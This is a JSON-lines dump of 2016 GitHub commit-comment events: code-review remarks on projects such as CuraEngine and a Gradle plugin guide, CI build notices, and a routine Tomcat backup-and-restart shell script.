{"id":"4561164361","type":"CommitCommentEvent","actor":{"login":"paulraysmile"},"repo":{"name":"paulraysmile/backup"},"payload":{"comment":{"id":19016062,"position":null,"line":null,"path":null,"commit_id":"1798320c4956051f2b2a819c93da8099f562cf9f","created_at":"2016-09-14T10:38:35Z","updated_at":"2016-09-14T10:38:35Z","body":"#!/bin/sh\r\nPROJECT='auction'\r\nENV='regress'\r\nBAK='yes'\r\nif [ -n \"$1\" ] ; then\r\n        PROJECT=$1\r\nfi\r\nif [ -n \"$2\" ] ; then\r\n        ENV=$2\r\nfi\r\nif [ -n \"$3\" ] ; then\r\n        BAK=$3\r\nfi\r\n\r\nBAK_DIR=$HOME/bak\r\nSVR_DIR=$HOME/service\r\nAPP_DIR=$SVR_DIR/${PROJECT}_${ENV}/webapps\r\nWAR_NAME=${PROJECT}_${ENV}\r\n\r\nif [ $ENV = 'online' ] ; then\r\n        APP_DIR=$SVR_DIR/$PROJECT/webapps        \r\n        WAR_NAME=${PROJECT}\r\nfi\r\n\r\n##bak\r\nif [ $BAK = 'yes' ] ; then\r\n\techo '备份war包中...'\r\n\tcp $APP_DIR/${PROJECT}.war $BAK_DIR/${WAR_NAME}.war_`date -d \"now\" +%Y%m%d%H%M%S`\r\n\techo '备份日志中...'\r\n\tcd $SVR_DIR/${WAR_NAME}\r\n\ttar -cf $BAK_DIR/${WAR_NAME}_logs.tar.`date -d \"now\" +%Y%m%d%H%M%S` logs\r\n\techo '删除日志..'\r\n\trm $SVR_DIR/${WAR_NAME}/logs/*\r\nfi\r\n\r\n##restart\r\ncp $SVR_DIR/${WAR_NAME}.war $APP_DIR/${PROJECT}.war\r\n$SVR_DIR/${WAR_NAME}/bin/shutdown.sh\r\nps -ef | grep \"service/$WAR_NAME/\" | awk '{print $2}' | xargs kill -15\r\nps -ef | grep \"service/$WAR_NAME/\" | awk '{print $2}' | xargs kill -9\r\n$SVR_DIR/${WAR_NAME}/bin/startup.sh\r\ntail -f $SVR_DIR/${WAR_NAME}/logs/catalina.out"}},"created_at":"2016-09-14T10:38:35Z"}
{"id":"4561164553","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19016063,"position":70,"line":470,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-14T10:38:38Z","updated_at":"2016-09-14T10:38:38Z","body":"`a -> 1` < `1 -> 2`? Why is that relevant? I don't really see the overview here, I guess."}},"created_at":"2016-09-14T10:38:38Z"}
{"id":"4561165536","type":"CommitCommentEvent","actor":{"login":"Robert1191"},"repo":{"name":"tdbt1985/Serler_Stream2"},"payload":{"comment":{"id":19016066,"position":4,"line":4,"path":"app/views/layouts/_footer.html.erb","commit_id":"2b0e1bea61300e01a7d4ebed745e4525417768a3","created_at":"2016-09-14T10:38:52Z","updated_at":"2016-09-14T10:38:52Z","body":"As Jim notice that we might not need the footer"}},"created_at":"2016-09-14T10:38:52Z"}
{"id":"4561166259","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19016068,"position":55,"line":50,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:39:02Z","updated_at":"2016-09-14T10:39:02Z","body":"Should we use [getByType](https://docs.gradle.org/3.0/javadoc/org/gradle/api/plugins/ExtensionContainer.html#getByType(java.lang.Class)) instead and avoid the cast?\r\n\r\nThe only reason _not_ to do this that I can think of is the possibility of there being two `GreetingExtension` objects registered, in which case that method will throw (at least I think it should, that's what such a method should do, but the behavior isn't documented).\r\n\r\nIn any case, there is in fact only one `GreetingExtension` registered here, and if I were the author of that plugin, I'd make the class package-private such that no one else outside my plugin _could_ register an extension of that type. This would make it impossible to have more than one extension in the container.\r\n\r\nAnyway, the main question is whether we should favor `getByType` over `getByName`. The cast is ugly and bad for first impressions."}},"created_at":"2016-09-14T10:39:02Z"}
{"id":"4561168265","type":"CommitCommentEvent","actor":{"login":"hhirsch"},"repo":{"name":"GlPortal/RadixEngine"},"payload":{"comment":{"id":19016073,"position":null,"line":null,"path":null,"commit_id":"12d1f1d4ab3c9bc7d93ef795de91e525333e6b77","created_at":"2016-09-14T10:39:30Z","updated_at":"2016-09-14T10:39:30Z","body":"@Geertiebear Had to remove this from master because it does not compile. I'll try to fix it myself ASAP."}},"created_at":"2016-09-14T10:39:30Z"}
{"id":"4561170266","type":"CommitCommentEvent","actor":{"login":"ibininja"},"repo":{"name":"vgavro/python-instagram"},"payload":{"comment":{"id":19016079,"position":null,"line":null,"path":null,"commit_id":"9dfc264571ad7c343af3899445d13afedf23e3aa","created_at":"2016-09-14T10:39:58Z","updated_at":"2016-09-14T10:39:58Z","body":"Nicely done."}},"created_at":"2016-09-14T10:39:58Z"}
{"id":"4561173187","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19016088,"position":null,"line":null,"path":null,"commit_id":"23ee489d2e5b17f1b1cec48f1bc0e4bbb5b30b6e","created_at":"2016-09-14T10:40:41Z","updated_at":"2016-09-14T10:40:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 992](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13227&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T10:40:41Z"}
{"id":"4561182319","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19016112,"position":null,"line":null,"path":null,"commit_id":"e295a74c52449df59f532f94270201a63eb9b75c","created_at":"2016-09-14T10:42:52Z","updated_at":"2016-09-14T10:42:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 991](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13224&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:11:43"}},"created_at":"2016-09-14T10:42:52Z"}
{"id":"4561184075","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":19016115,"position":null,"line":null,"path":null,"commit_id":"3f31956c7bccb9c7989fd2b9c97fe56d0b59d2cf","created_at":"2016-09-14T10:43:16Z","updated_at":"2016-09-14T10:43:16Z","body":"some changes were already implemented. so thats it ! i think"}},"created_at":"2016-09-14T10:43:16Z"}
{"id":"4561184319","type":"CommitCommentEvent","actor":{"login":"rdvincent"},"repo":{"name":"BIC-MNI/libminc"},"payload":{"comment":{"id":19016118,"position":null,"line":null,"path":null,"commit_id":"464f006e1d184eb311671e16bd71442211315283","created_at":"2016-09-14T10:43:19Z","updated_at":"2016-09-14T10:43:19Z","body":"@gdevenyi I'm definitely interested in some test NRRD images."}},"created_at":"2016-09-14T10:43:19Z"}
{"id":"4561184717","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19016121,"position":60,"line":52,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:43:24Z","updated_at":"2016-09-14T10:43:24Z","body":"On one hand, `printf` may look a little cryptic to the average Java developer, but on the other hand, it shouldn't and it makes everything shorter and more readable so long as you're not afraid of the syntax.\r\n\r\nMost languages have this kind of string-formatting approach, so it should be obvious enough to folks from other ecosystems, too.\r\n\r\nBesides getting rid of a line of code, it also removes the awkward problem of what to name the `msg` variable. We already have something called \"message\" in the extension. Calling the local variable \"greeting\" could be fine, but when I see that it starts making me wonder why we called the task `hello` instead of `greet`. And then that gets me frustrated because I actually do want to call it `hello` for practical purposes, as `gradle greet` just looks awkward to me, whereas `gradle hello` \"feels\" right in this context (even though the actual greeting could be anything, like \"bonjour\").\r\n\r\nThe main question here (and for subsequent guides) is whether to favor string formatting like this as opposed to string concatenation. As indicated by the change, I'm leaning toward the former."}},"created_at":"2016-09-14T10:43:24Z"}
{"id":"4561185110","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19016122,"position":101,"line":501,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-14T10:43:30Z","updated_at":"2016-09-14T10:43:30Z","body":"I don't see why this can't happen?"}},"created_at":"2016-09-14T10:43:30Z"}
{"id":"4561185308","type":"CommitCommentEvent","actor":{"login":"kashike"},"repo":{"name":"DemonWav/MinecraftDevIntelliJ"},"payload":{"comment":{"id":19016123,"position":95,"line":95,"path":"src/main/java/com/demonwav/mcdev/update/PluginUpdater.java","commit_id":"d9efde22047f66bf5df940c12a2a8d5ab6f62939","created_at":"2016-09-14T10:43:33Z","updated_at":"2016-09-14T10:43:33Z","body":"Oi."}},"created_at":"2016-09-14T10:43:33Z"}
{"id":"4561186195","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19016127,"position":69,"line":59,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:43:44Z","updated_at":"2016-09-14T10:43:44Z","body":"Let's use literal syntax to refer to literal things, like task names."}},"created_at":"2016-09-14T10:43:44Z"}
{"id":"4561194529","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19016143,"position":76,"line":66,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:45:45Z","updated_at":"2016-09-14T10:45:45Z","body":"Agreed. And note that with regard to these comments, you could also add these as comments on your own commits, just like I'm doing with this comment here. I'll make sure to read any such comments when doing reviews in the future, and this is one more reason it's important to reference the guide issue in the commit comment—it helps ensure that I (or any other reviewer) sees that there are such comments on the commit, since the little comment bubble will show up in the activity feed next to the commit entry."}},"created_at":"2016-09-14T10:45:45Z"}
{"id":"4561195590","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":19016165,"position":null,"line":null,"path":null,"commit_id":"3f31956c7bccb9c7989fd2b9c97fe56d0b59d2cf","created_at":"2016-09-14T10:46:00Z","updated_at":"2016-09-14T10:46:00Z","body":"А промежуточные патчи не нужны?"}},"created_at":"2016-09-14T10:46:00Z"}
{"id":"4561197198","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19016204,"position":247,"line":647,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-14T10:46:22Z","updated_at":"2016-09-14T10:46:22Z","body":"This 200-line loop is way too long and complex. Is it possible to break it up a bit? Each major case in a separate function, for instance?"}},"created_at":"2016-09-14T10:46:22Z"}
{"id":"4561197917","type":"CommitCommentEvent","actor":{"login":"putraeka"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":19016224,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-14T10:46:32Z","updated_at":"2016-09-14T10:46:32Z","body":"As long as the users not included affiliate link previously and we can opt out from settings. That's okay for me, that's tumblr's way to make more money from it's platform"}},"created_at":"2016-09-14T10:46:32Z"}
{"id":"4561198590","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19016241,"position":97,"line":80,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:46:40Z","updated_at":"2016-09-14T10:46:40Z","body":"This was all about reversing the order in which the `message` and `name` properties show up in the file. Because it's more natural to read \"Hello\", then \"World\"."}},"created_at":"2016-09-14T10:46:40Z"}
{"id":"4561206156","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19016433,"position":101,"line":83,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:48:26Z","updated_at":"2016-09-14T10:48:26Z","body":"This instance of \"our\" was the only use of the \"we\" voice in the document. Let's favor the second-person voice (\"your extension\") or, better I think in cases where we're referring to code that's been written, the third-person voice (\"the extension\")."}},"created_at":"2016-09-14T10:48:26Z"}
{"id":"4561214347","type":"CommitCommentEvent","actor":{"login":"stevenjack"},"repo":{"name":"vidsy/static-assets"},"payload":{"comment":{"id":19016456,"position":null,"line":null,"path":null,"commit_id":"ee924d9b69586559adf0da2437509d1f237d1011","created_at":"2016-09-14T10:50:26Z","updated_at":"2016-09-14T10:50:26Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;9CHFULTX&#x2F;459-sa-use-correct-data-attributes-when-opening-video-dialog\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [SA] Use correct data attributes when opening video dialog</a>"}},"created_at":"2016-09-14T10:50:26Z"}
{"id":"4561216069","type":"CommitCommentEvent","actor":{"login":"mavrothal"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19016463,"position":8,"line":471,"path":"initrd-progs/0initrd/init","commit_id":"a60d175334693805ed90d094d4a39efe100e2c32","created_at":"2016-09-14T10:50:52Z","updated_at":"2016-09-14T10:50:52Z","body":"Removing rc.local breaks user customisation and/or fixes.\r\nActually ``` rm -f ./etc/rc.d/rc.{sysinit,update}``` should suffice as the rest are copied over in rc.update and are not used till that point."}},"created_at":"2016-09-14T10:50:52Z"}
{"id":"4561217801","type":"CommitCommentEvent","actor":{"login":"hhirsch"},"repo":{"name":"GlPortal/RadixEngine"},"payload":{"comment":{"id":19016468,"position":null,"line":null,"path":null,"commit_id":"12d1f1d4ab3c9bc7d93ef795de91e525333e6b77","created_at":"2016-09-14T10:51:18Z","updated_at":"2016-09-14T10:51:18Z","body":"@Geertiebear Nvm. it works great now."}},"created_at":"2016-09-14T10:51:18Z"}
{"id":"4561218992","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19016473,"position":118,"line":115,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:51:35Z","updated_at":"2016-09-14T10:51:35Z","body":"Small detail, but I believe this is the more common output for a \"Hello, World!\". Double checked this on Google / Wikipedia, and found that Kernighan actually wrote it this way in _Programming in C_ :)"}},"created_at":"2016-09-14T10:51:35Z"}
{"id":"4561219860","type":"CommitCommentEvent","actor":{"login":"yairchu"},"repo":{"name":"julianstorer/JUCE"},"payload":{"comment":{"id":19016477,"position":3,"line":25,"path":"modules/juce_audio_plugin_client/juce_audio_plugin_client_Standalone.cpp","commit_id":"2fd331fac7573f2a2db68a0fc600c2bfde610415","created_at":"2016-09-14T10:51:48Z","updated_at":"2016-09-14T10:51:48Z","body":"Should the check also be updated?"}},"created_at":"2016-09-14T10:51:48Z"}
{"id":"4561220517","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19016479,"position":134,"line":129,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:51:57Z","updated_at":"2016-09-14T10:51:57Z","body":"Reflecting the more intuitive ordering of these properties as mentioned above."}},"created_at":"2016-09-14T10:51:57Z"}
{"id":"4561223889","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19016488,"position":155,"line":144,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:52:44Z","updated_at":"2016-09-14T10:52:44Z","body":"Striking through the bit about removing the `GreetingPlugin` class, as It doesn't make sense without the bits about introducing a plugin identifier."}},"created_at":"2016-09-14T10:52:44Z"}
{"id":"4561223949","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19016489,"position":null,"line":null,"path":null,"commit_id":"23ee489d2e5b17f1b1cec48f1bc0e4bbb5b30b6e","created_at":"2016-09-14T10:52:44Z","updated_at":"2016-09-14T10:52:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 992](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13227&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:12:03"}},"created_at":"2016-09-14T10:52:44Z"}
{"id":"4561228640","type":"CommitCommentEvent","actor":{"login":"raghavrv"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":19016499,"position":30,"line":607,"path":"sklearn/model_selection/_validation.py","commit_id":"8cfebf2e63b1369ee0caba93cbdd887b369dab50","created_at":"2016-09-14T10:53:49Z","updated_at":"2016-09-14T10:53:49Z","body":"@jnothman Thanks for the reviews... Do we want this as a PR?"}},"created_at":"2016-09-14T10:53:49Z"}
{"id":"4561229261","type":"CommitCommentEvent","actor":{"login":"MikuAuahDark"},"repo":{"name":"MikuAuahDark/NPPS"},"payload":{"comment":{"id":19016501,"position":null,"line":null,"path":null,"commit_id":"b86dfb7cd10a05c268173183d03916763078924e","created_at":"2016-09-14T10:53:58Z","updated_at":"2016-09-14T10:53:58Z","body":"Check if there's `marathon.db_` present in `<npps dir>/data/event`"}},"created_at":"2016-09-14T10:53:58Z"}
{"id":"4561229978","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19016504,"position":null,"line":null,"path":null,"commit_id":"fd626d203a3704c9c85350e3e5d30d2245f771a2","created_at":"2016-09-14T10:54:10Z","updated_at":"2016-09-14T10:54:10Z","body":"os_2.0_develop_signal_slot_bug (mbadams5) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fd626d203a3704c9c85350e3e5d30d2245f771a2-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fd626d203a3704c9c85350e3e5d30d2245f771a2-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T10:54:10Z"}
{"id":"4561230561","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19016506,"position":140,"line":540,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-14T10:54:16Z","updated_at":"2016-09-14T10:54:16Z","body":"Might as well call it `p3`."}},"created_at":"2016-09-14T10:54:16Z"}
{"id":"4561231292","type":"CommitCommentEvent","actor":{"login":"bklukaczewski"},"repo":{"name":"theirc/Searcher"},"payload":{"comment":{"id":19016508,"position":null,"line":null,"path":null,"commit_id":"8c15cf3a4012839410fb47339eab165694cc6be8","created_at":"2016-09-14T10:54:27Z","updated_at":"2016-09-14T10:54:27Z","body":"@kamilnowak "}},"created_at":"2016-09-14T10:54:27Z"}
{"id":"4561234566","type":"CommitCommentEvent","actor":{"login":"pkofod"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19016542,"position":null,"line":null,"path":null,"commit_id":"30bf89f3d8e564b588b8e48993e92a551b384f2c","created_at":"2016-09-14T10:55:15Z","updated_at":"2016-09-14T10:55:15Z","body":"any idea if the spvec regression is \"real\" or a fluke? 15% seems quite significant and related to this commit even."}},"created_at":"2016-09-14T10:55:15Z"}
{"id":"4561237059","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19016609,"position":154,"line":145,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:55:49Z","updated_at":"2016-09-14T10:55:49Z","body":"I'm on the fence here. Even before reading this comment, I had a note to myself that we should probably include the plugin identifier instructions.\r\n\r\nMy rationale for going ahead with a step on introducing a plugin identifier, is that it demystifies how all the other plugins they already use (`java`, `maven`, etc) map to the kinds of `Plugin` classes no different than the one the reader just wrote.\r\n\r\nIt feels pretty fundamental to introduce this, and not like a rabbit hole, since it can be covered in a very  discrete way."}},"created_at":"2016-09-14T10:55:49Z"}
{"id":"4561241300","type":"CommitCommentEvent","actor":{"login":"kamilnowak"},"repo":{"name":"theirc/Searcher"},"payload":{"comment":{"id":19016716,"position":null,"line":null,"path":null,"commit_id":"8c15cf3a4012839410fb47339eab165694cc6be8","created_at":"2016-09-14T10:56:49Z","updated_at":"2016-09-14T10:56:49Z","body":"Yes, that was my mistake. Sorry for that"}},"created_at":"2016-09-14T10:56:49Z"}
{"id":"4561245234","type":"CommitCommentEvent","actor":{"login":"evan888"},"repo":{"name":"evan888/Eagleget"},"payload":{"comment":{"id":19016796,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-14T10:57:47Z","updated_at":"2016-09-14T10:57:47Z","body":"s u d o _ u s e r s = { 137103513 }"}},"created_at":"2016-09-14T10:57:47Z"}
{"id":"4561247562","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19016804,"position":163,"line":156,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:58:21Z","updated_at":"2016-09-14T10:58:21Z","body":"This line is a placeholder to call out that we should only add bullet points to \"Next steps\" that actually have a link target. I covered the rationale and instructions for how to do this in gradle-guides/gs-building-jvm-libraries@a6e357ce9fbf29353c3938231d67cbd19243d7be.\r\n\r\nThe specific link there is to one of the link targets we know we can point the user to, which is the \"Writing Custom Plugins\" section of the user manual. It's not perfect, but it is something they can read and follow next after doing this guide. Everything else we need to get cards on the board for and remove from the text of this guide."}},"created_at":"2016-09-14T10:58:21Z"}
{"id":"4561250716","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19016817,"position":17,"line":31,"path":"build.gradle","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:59:08Z","updated_at":"2016-09-14T10:59:08Z","body":"These changes reflect the attributes seen in _Building JVM Libraries_, and fix an unresolved `{gradle-version}` reference that was showing up in the rendered guide."}},"created_at":"2016-09-14T10:59:08Z"}
{"id":"4561251420","type":"CommitCommentEvent","actor":{"login":"isimluk"},"repo":{"name":"matobet/manageiq"},"payload":{"comment":{"id":19016820,"position":5,"line":8,"path":"lib/extensions/ar_region.rb","commit_id":"0401c16fef5d1ba5f8b5aa5ae432834b1322140b","created_at":"2016-09-14T10:59:18Z","updated_at":"2016-09-14T10:59:18Z","body":"https://github.com/ManageIQ/manageiq/pull/11249"}},"created_at":"2016-09-14T10:59:18Z"}
{"id":"4561253930","type":"CommitCommentEvent","actor":{"login":"weltling"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":19016827,"position":null,"line":null,"path":null,"commit_id":"acc574d76b60d23b48f8fa561084eb859c2e0766","created_at":"2016-09-14T10:59:54Z","updated_at":"2016-09-14T10:59:54Z","body":"Nope, Jakub. If a patch applies to multiple branches, NEWS in all relevant branches have to be updated separately. It was always that way.\r\n\r\nThanks."}},"created_at":"2016-09-14T10:59:54Z"}
{"id":"4561254879","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19016831,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-14T11:00:10Z","updated_at":"2016-09-14T11:00:10Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.167](http://build.clear-measure.com/viewLog.html?buildId=10452&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-14T11:00:10Z"}
{"id":"4561256286","type":"CommitCommentEvent","actor":{"login":"hothero"},"repo":{"name":"BackerFounder/active_merchant_sinopac"},"payload":{"comment":{"id":19016839,"position":71,"line":223,"path":"lib/offsite_payments/integrations/sinopac.rb","commit_id":"0b9458041baa6edcf32d54cd90322544829e6cd6","created_at":"2016-09-14T11:00:28Z","updated_at":"2016-09-14T11:00:28Z","body":"這邊為什麼欄位值要改成 OrderID 然後上面的 parse_xml 則是 OrderNo？"}},"created_at":"2016-09-14T11:00:28Z"}
{"id":"4561258483","type":"CommitCommentEvent","actor":{"login":"phaazon"},"repo":{"name":"lolengine/lol"},"payload":{"comment":{"id":19016842,"position":30,"line":30,"path":"src/gpu/blit.lolfx","commit_id":"bb98e8d5783dbca74506a6f7d84079598c3ef898","created_at":"2016-09-14T11:00:56Z","updated_at":"2016-09-14T11:00:56Z","body":"`vec2 texcoords = pos * .5 + .5` should be working as well, right?"}},"created_at":"2016-09-14T11:00:56Z"}
{"id":"4561259139","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":19016843,"position":46,"line":46,"path":"src/sbin/opnsense-auth","commit_id":"b90babbfd2425e201c372f631c47019572d0f4ac","created_at":"2016-09-14T11:01:07Z","updated_at":"2016-09-14T11:01:07Z","body":"Ok, that's good. From a practical standpoint the empty password \"\" should, however, be possible, but that's for later to clean up. I don't expect this to hit much before 17.1 due to the xauth change and migration woes in IPSec?\n\n> On 14.09.2016, at 10:21, Ad Schellevis <notifications@github.com> wrote:\n> \n> @fichtner password= would also return 2, but if it would return 1 it's also ok, both result in an empty password (which receives not authenticated).\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-14T11:01:07Z"}
{"id":"4561262216","type":"CommitCommentEvent","actor":{"login":"tomari"},"repo":{"name":"arigato-java/javabound"},"payload":{"comment":{"id":19016851,"position":null,"line":null,"path":null,"commit_id":"5b4d9d4e976adafad8f7f9728036f35ae901c920","created_at":"2016-09-14T11:01:52Z","updated_at":"2016-09-14T11:01:52Z","body":"Great contributions so far! Cheers to you, toby-san."}},"created_at":"2016-09-14T11:01:52Z"}
{"id":"4561263945","type":"CommitCommentEvent","actor":{"login":"eltirol"},"repo":{"name":"rovo89/XposedInstaller"},"payload":{"comment":{"id":19016856,"position":null,"line":null,"path":null,"commit_id":"cdb3f47895f5543eca0ff94861f5a98b343213c6","created_at":"2016-09-14T11:02:17Z","updated_at":"2016-09-14T11:02:17Z","body":"Ok\r\n"}},"created_at":"2016-09-14T11:02:17Z"}
{"id":"4561263968","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19016857,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-14T11:02:18Z","updated_at":"2016-09-14T11:02:18Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.167](http://build.clear-measure.com/viewLog.html?buildId=10452&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:02:06"}},"created_at":"2016-09-14T11:02:18Z"}
{"id":"4561266826","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19016863,"position":null,"line":null,"path":null,"commit_id":"23ee489d2e5b17f1b1cec48f1bc0e4bbb5b30b6e","created_at":"2016-09-14T11:02:59Z","updated_at":"2016-09-14T11:02:59Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 993](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13232&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T11:02:59Z"}
{"id":"4561270287","type":"CommitCommentEvent","actor":{"login":"silvanheller"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":19016867,"position":15,"line":15,"path":"src/org/vitrivr/cineast/core/db/NeuralNetLookup.java","commit_id":"800af9a5026a4094620fcc2304f0dcb8b6454cd5","created_at":"2016-09-14T11:03:49Z","updated_at":"2016-09-14T11:03:49Z","body":"Because it would be nice if there was an easy way to ask the system how it classified a shot"}},"created_at":"2016-09-14T11:03:49Z"}
{"id":"4561275513","type":"CommitCommentEvent","actor":{"login":"Chimmis"},"repo":{"name":"baronas15/Budgety"},"payload":{"comment":{"id":19016890,"position":null,"line":null,"path":null,"commit_id":"3ec8da2f5272dbf4a5d0b73d1b99a133d707e820","created_at":"2016-09-14T11:05:08Z","updated_at":"2016-09-14T11:05:08Z","body":"Čia yoyoyo reiškia no gf"}},"created_at":"2016-09-14T11:05:08Z"}
